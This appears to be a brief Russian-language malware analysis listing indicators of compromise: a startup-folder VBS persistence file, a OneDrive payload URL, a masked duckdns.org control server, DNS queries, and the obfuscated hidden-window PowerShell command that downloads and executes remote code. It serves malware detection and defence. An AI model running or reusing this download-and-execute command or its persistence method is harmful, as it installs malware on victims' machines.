Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- https://onedrive.live.com/download?cid=409b9a5b5f0f876c&resid=409b9a5b5f0f876c%213228&authkey=aje3jgmegwofwsu
- 'da#####85.duckdns.org':1985
- 'on####ve.live.com':443
- 'lh####.#y.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK lh####.#y.files.1drv.com
- DNS ASK da#####85.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=409B9A5B5F0F876C&resid=409B9A5B5F0F876C%213228&authkey=AJe3JgmEGWOfwsU'')'));...' (со скрытым окном)